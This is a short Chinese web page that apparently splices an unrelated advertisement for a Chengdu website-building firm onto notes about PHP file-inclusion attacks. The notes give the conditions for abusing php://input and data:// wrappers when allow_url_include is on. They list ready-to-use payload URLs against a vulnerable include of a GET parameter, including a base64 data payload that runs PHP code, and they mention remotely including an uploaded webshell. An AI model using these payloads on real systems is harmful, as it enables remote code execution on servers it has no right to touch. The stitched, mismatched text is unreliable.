条件:
专注于为中小企业提供网站建设、成都网站建设服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业建阳免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了1000+企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。
【条件】在allow_url_include = On 且 PHP >= 5.2.0
【优势】直接POST php代码并执行
【须知】必须使用包含切执行函数(比如 include require) 不能使用file_get_contents等 用这些函数不会执行data/input里面函数。
【点评】这其实是一种思路而已 当allow_url_include打开的时候 随便找个webshell上传一句话都可以远程包含了。
php://input
0x007.com/data.php?a=php://input
post提交: 任意的php代码
data:
include $_GET['a'];
0x007.com/data.php?a=data:text/plain,
0x007.com/data.php?a=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=
0x007.com/data.php?a=data:;base64,PD9waHBpbmZvKCk7Lyo=